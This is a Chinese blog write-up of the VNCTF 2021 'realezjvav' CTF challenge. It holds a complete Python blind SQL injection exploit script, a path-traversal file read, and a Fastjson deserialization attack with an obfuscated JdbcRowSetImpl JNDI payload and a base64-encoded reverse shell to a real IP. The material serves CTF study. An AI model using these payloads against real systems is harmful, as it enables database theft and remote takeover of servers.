2021年 VNCTF realezjvav复现

最新推荐文章于 2023-09-11 15:35:06 发布
最新推荐文章于 2023-09-11 15:35:06 发布
阅读量380 收藏 1
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43085611/article/details/116903620
版权

文章目录


hint:

  • 不会有web手电脑里没IDA吧,不会吧不会吧
  • 仔细阅读package.json哦/汪汪

1.1 基于运行时的报错注入

尝试进行SQL注入,有关键字过滤。union、sleep、benchmark、rlike都被过滤了。

猜测为有过滤的字符型注入,尝试使用其他方法进行盲注,或者尝试进行报错注入。优先考虑报错注入。使用name_const方法可以可以导致报错。payload为:

# 正常
' or (1) or '
' or if(0, pow(2, 1024), 0) or '
# 报错
' or if(1, pow(2, 1024), 0) or '

这里我普及了一下报错注入,报错注入大致可以分为 2 种。一是基于报错信息回显,二是基于运行时报错(从而实现布尔注入)。整理了一下基于运行时报错的Payload:

# 参考教程:https://xz.aliyun.com/t/4914#toc-4
# 运行时错误:ERROR 1690 (22003): DOUBLE value is out of range in 'pow(2,1024)
# 21000、22001、22002、22003
select if(0, pow(2, 1024), 0);
select if(0, cot(0), 0);
# exp函数的参数在大于709的情况下会导致sql语句执行失败
select if(0, exp(710), 0);

select if(0, (select 1 from mysql.user), 0);
select if(0, (cot(0)), 0);

select count(*), floor(rand(0) * 2) x
from mysql.user
group by if(0, x, 0);
#
# 绕过预检查。使用动态解析变量的函数
SELECT IF(0, ST_X(ST_GeomFromText('POINT(mads)')), 0);
SELECT IF(0, ST_MPointFromText('MADS'), 0);
SELECT IF(0, ST_GeomFromText('MADS'), 0);

报错注入的exp:

import requests

# 基本信息
base_url = 'http://1a0a3805-97fa-47cd-b059-951bde2b91d0.node3.buuoj.cn'


def judge(response):
    true_info = 'Ha1c9on'
    false_info = '500'

    # 中文编码
    text = response.text
    if '\\u' in text:
        text = text.encode('latin-1').decode('unicode_escape')
    if true_info in text:
        return True
    elif false_info in text:
        return False
    else:
        print("judge发生错误")
        print(response.text)


def execute_sql(sql):
    url = f'{base_url}/user/login'

    fuzz = range(32, 126)
    fuzz = list(map(chr, fuzz))
    pos = 0

    result = ''
    while True:
        # pos从1开始递增,直到fuzz字典跑完,退出。
        pos += 1
        right_c = ''
        for c in fuzz:
            ascii_c = ord(c)
            data = {
                'username': 'admin',
                'password': f"' or (if(ascii(substr(({sql}),{pos},1))={ascii_c}, 1, (select 1 from mysql.user))) or '",
            }
            print(data['password'])
            params = {}
            cookies = {}
            headers = {
                'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36'
            }

            from time import sleep
            sleep(0.2)
            response = requests.post(url=url,
                                     headers=headers,
                                     params=params,
                                     data=data,
                                     cookies=cookies)
            # print(str(response.text).encode('latin-1').decode('unicode_escape'))
            if judge(response):
                right_c = c
                break
        result += right_c
        print(result)
        # 没有找到
        if right_c == '':
            break
    print('result', result)
    return result


def exploit():
    payloads = [
        "SELECT database()",
        "SELECT USER()",
        "SELECT group_concat(schema_name) from information_schema.schemata",
        "SELECT group_concat(table_name) from information_schema.tables where table_schema=database()",
        "SELECT group_concat(column_name) from information_schema.columns where table_name='user'",
        "SELECT password from `user` where username='admin'",
    ]
    # for payload in payloads:
    # sql = payload

    while True:
        sql = input('sql:')
        print('payload:', sql)
        execute_sql(sql)
        print('----------------------')


if __name__ == '__main__':
    exploit()

BUUCTF中对请求速度做了限制,所以在请求前加了 sleep。通过 exp 查到下面的信息:

  • database:ctf
  • tables:user
  • user表的字段:
    id,username,password,Host,User,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shut(没读完,太多了)
  • admin的密码:no_0ne_kn0w_th1s

登录admin账号,然后发现网站存在本地任意文件读取,尝试读取本地配置文件。

  • …/…/…/…/…/…/…/…/…/…/…/…/etc/passwd
  • maven配置文件:…/…/…/…/…/pom.xml

在pom.xml中发现该网站使用了fastjson库,版本是1.2.27。在创建角色时,发送的信息为 json。

1.2 FastJson反序列化

使用 JNDI-Injection-Exploit 搭建ldap服务。

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuNS43NC4xMjMvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -A "121.5.74.123"

-C 代表执行命令,而后面的命令是 java.lang.Runtime.exec 执行的代码,和常见的命令不太相同,可以采用 java.lang.Runtime.exec() Payload Workarounds - @Jackson_T 将命令 bash -i >& /dev/tcp/121.5.74.123/9999 0>&1 转换成 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuNS43NC4xMjMvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}

在服务器执行 nc -lvnp 9999 接收 shell。

Burp 发送Payload:(记得替换ldap的地址)

roleJson={"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"name":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://121.5.74.123:1389/yhqxxx","autoCommit":true}}

发现被检测出出来,使用 unicode 编码绕过:

{"e":{"\u0040\u0074\u0079\u0070\u0065":"\u006A\u0061\u0076\u0061\u002E\u006C\u0061\u006E\u0067\u002E\u0043\u006C\u0061\u0073\u0073","\u0076\u0061\u006C":"\u0063\u006F\u006D\u002E\u0073\u0075\u006E\u002E\u0072\u006F\u0077\u0073\u0065\u0074\u002E\u004A\u0064\u0062\u0063\u0052\u006F\u0077\u0053\u0065\u0074\u0049\u006D\u0070\u006C"},"\u006E\u0061\u006D\u0065":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006F\u006D\u002E\u0073\u0075\u006E\u002E\u0072\u006F\u0077\u0073\u0065\u0074\u002E\u004A\u0064\u0062\u0063\u0052\u006F\u0077\u0053\u0065\u0074\u0049\u006D\u0070\u006C","\u0064\u0061\u0074\u0061\u0053\u006F\u0075\u0072\u0063\u0065\u004E\u0061\u006D\u0065":"ldap://121.5.74.123:1389/a82emq","\u0061\u0075\u0074\u006F\u0043\u006F\u006D\u006D\u0069\u0074":true}}

最后可以在根目录找到 flag 文件。

参考教程:

chiehw
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VNCTF2021 realezjvav复现(fastjson漏洞利用)
midi
03-16 2055
VNCTF2021 realezjvav复现 漏洞点: sql注入 fastjson漏洞(学到了学到了ORZ) 参考 官方wp 红队武器库:fastjson小于1.2.68全漏洞RCE利用exp bfengj师傅 复现过程 根据页面提示(Only the admin can get the right page) 以及源码,提示是sql注入,确定了用户名为admin,密码用test’ 报错500 用test’ # 正常200,fuzz下以及看师傅们的wp,知道要用笛卡儿积盲注 payload1: impo
VNCTF2022公开赛 Web gocalc0
cadandme的博客
02-13 673
粗心大意要不得
从CTF题学Java反序列化(二)
why811的博客
09-11 283
现在命令执行的点和反序列化的点都找到了,剩下就是需要找到一条将其连起来的利用链。可以上传文件,但是需要session中group为webmanager。类,然后修改cookie,触发反序列化漏洞达成命令执行。然后就可以正常上传文件了,文件上传没有检测,上传目录是。类存取session内容进行序列化反序列化,但是这个。对传入cookie内容直接进行反序列化的漏洞,加上。看到展示了访问日志,并没有其他功能,继续审计源码。是原生类,jdk8下可以使用,不需要考虑环境问题。,判断用户名为admin,密码随机生成。
[BUUCTF][VNCTF2022公开赛]web wp
cosmoslin的博客
02-14 2523
GameV4.0 base64解码即可 newcalc0 镜像为node:lts-alpine,package.json全部为最新包 const express = require("express"); const path = require("path"); const vm2 = require("vm2"); const app = express(); app.use(express.urlencoded({ extended: true })); app.use(express.json(
西湖论剑 2022复现
weixin_63231007的博客
03-03 1114
[西湖论剑 2022] Node Magical Login & [西湖论剑 2022] real_ez_node & [西湖论剑 2022] 扭转乾坤 & [西湖论剑 2022] unusual php
2022西湖论剑-初赛CTF部分wp-Zodiac
toto的博客
02-03 3317
2023西湖论剑初赛CTF部分wp
DASCTF NOV&&EzNode2的两种解法
v2ish1yan的博客
01-14 288
EzNode2的两种解法
[VNCTF 2021]realezjvav 复现
feng的博客
03-16 1153
前言 这次VNCTF的题目还是挺难的,web唯一一道php直接把我按着锤,只会php的我居然第一时间先去复现这道java(笑) 复现 跟着ha1师傅的WP走一遍,中间自己还好没有出什么太大的问题,虽然不会java,但是也拿SpringBoot写过一点点东西,对于“大名鼎鼎”的fastjson也是有所耳闻。 进入环境,f12看一下源码,可以看到注释里写的:both username and password are right , then you can enter the next level。再根据h
NahamConCTF-2021
03-15
NahamConCTF-2021
VNCTF2021[WEB]
Y4tacker的博客
03-18 3593
文章目录前言Ez_gamenaiverealezjvavEasy_laravel 前言 这次比赛题目质量很好,本菜鸡做出了两道web题目,还是比较开心,只是赛后复现laravel一天半也没有成功,我好自闭啊 Ez_game 在game.js里面发现,直接放到console里面跑,得到flag ["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"](((['sojson.v4']+[])["\x63\x6f\x6
VNCTF 公开赛 2021 factor
blog
03-14 1363
[VNCTF 2021] factor task.py from Crypto.Util.number import * from gmpy2 import * from secret import flag from icecream import * # flag = b'SYC{123123123123123}' def get_public_key(d): while 1: p, q = getPrime(512), getPrime(512) N, phi,
vnctf——cm1
weixin_52369224的博客
02-17 3121
从main函数开始看,发现在check的时候加载了assets⽬录中的⼀个dex⽂件,跟进发现在FileUtils⾥⾯。 主要逻辑在copyfile函数之中,进行异或处理,注意这里的以1024⼀组进⾏解密就可以。 key=b'vn2022' f1=open(r'ooo','rb+') f2=open(r'dex','wb+') while True: t=[] s=f1.read(1024) if len(s)==0: break for i i..
jackson-databind反序列化漏洞
公众号shadow sock7
09-17 7694
CVE-2019-14540 A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to com.zaxxer.hikari.HikariConfig. 这里使用的是:com.zaxxer.hikari.HikariConfig CVE-2019-...
利用Vulnhub复现漏洞 - Jackson-databind 反序列化漏洞(CVE-2017-7525)
JiangBuLiu的博客
07-10 8270
Jackson-databind 反序列化漏洞(CVE-2017-7525)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置CVE-2017-7525CVE-2017-17485 Vulnhub官方复现教程 https://vulhub.org/#/environments/jackson/CVE-2017-7525/ 漏洞原理 Jackson-da...
VNCTF(web)小白详解
anwen12的博客
03-23 1196
VNCTF(web)小白详解 看了下师傅们的wp,发现还挺难理解的。下面跟着大家做个简单的解答。 0x01 realezjvav 一上来就是常规的登录框,估摸着就是sql注入,paylod一拿到,一打,欸,不错,笛卡尔乘积盲注(原理:多个数据表链接的时候,数据大了,所以时间长)拿到密码no_0ne_kn0w_th1s 然后是这个,看不出来,我们继续。 发现这个就是我们fastjson,rce了。 https://github.com/welk1n/JNDI-Injection-Exploit/blob/
[红明谷CTF 2021]JavaWeb buu刷题记录
weixin_51458899的博客
04-08 1800
映入眼帘的报错,然后搜一下知道是spring的洞 有个登录,然后提示json,又看到cookie cve-2020-11989 Apache Shiro 身份验证绕过漏洞 (CVE-2020-11989) - 腾讯安全玄武实验室 (tencent.com) Apache Shiro权限绕过漏洞分析(CVE-2020-11989) (qq.com) 参考这两篇,得出两种攻击方式 payload1: 双编码绕过 / -> %2f ->%25%32%66 payload2: 分号 使用payl
cve-2021-3618漏洞复现
最新发布
02-06
6. 现在,你可以尝试复现CVE-2021-3618漏洞。使用Firefox浏览器访问一个存在安全漏洞的网站,如已知的恶意或受攻击的网站,或使用特定的payload触发漏洞。 7. 如果复现成功,可能会出现安全漏洞所导致的异常行为,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值